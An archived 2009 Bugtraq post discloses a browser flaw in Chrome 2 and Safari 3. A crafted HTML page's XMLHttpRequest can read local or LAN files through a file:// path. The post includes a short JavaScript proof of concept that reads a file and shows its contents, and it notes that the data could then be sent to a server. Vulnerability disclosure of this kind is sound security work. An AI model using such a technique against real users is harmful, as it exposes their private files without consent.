lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 9 Jun 2009 10:33:09 -0600
From: pantera_bleed@...mail.com
To: bugtraq@...urityfocus.com
Subject: XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3


.html can be crafted to force a unaware user to read file from local, and then possibly send it to a server.

var method = "GET"
var URL = "file:///C:/argentina/bsas_junin.txt"
xmlhttp.open( method, URL, true)

This type of request is possible if file is on user local  in the user hard disk (CHROME2), in other browser I was able to do the same but with a LAN access to file, no need to write in local hard disk (SAFARI3)


if (xmlhttp != null) {
	xmlhttp.open( method, URL, true)
	xmlhttp.onreadystatechange=function(){
	if (xmlhttp.readyState==4) {
           alert(URL + "\n\n" + xmlhttp.responseText)
		}
		}	 
	}

this is a valid operation javascript can read then xmlhttp.responseText, yes the file content.

After this you can do whatever you want whit the file.

note that you MUST know the file path!!

crafted by: federico.lanusse
pantera_bleed@...mail.com
federico.lanusse@...rolab.com

company: clarolab QA team
yeah! lets rock Ateam!!

Chrome ISSUE, with attached POC.
http://code.google.com/p/chromium/issues/detail?id=13671

Powered by blists - more mailing lists